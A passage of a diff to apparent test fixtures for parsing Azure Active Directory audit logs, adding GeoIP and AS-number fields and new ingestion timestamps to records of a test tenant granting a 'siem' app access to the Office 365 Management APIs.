"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -4985,6 +5309,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -5151,7 +5487,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124994100Z", + "ingested": "2021-12-14T14:48:43.176653690Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -5178,6 +5514,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -5344,7 +5692,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124999500Z", + "ingested": "2021-12-14T14:48:43.176654355Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -5371,6 +5719,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -5537,7 +5897,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125003300Z", + "ingested": "2021-12-14T14:48:43.176655198Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -5564,6 +5924,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -5730,7 +6102,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125008800Z", + "ingested": "2021-12-14T14:48:43.176655928Z", "original": 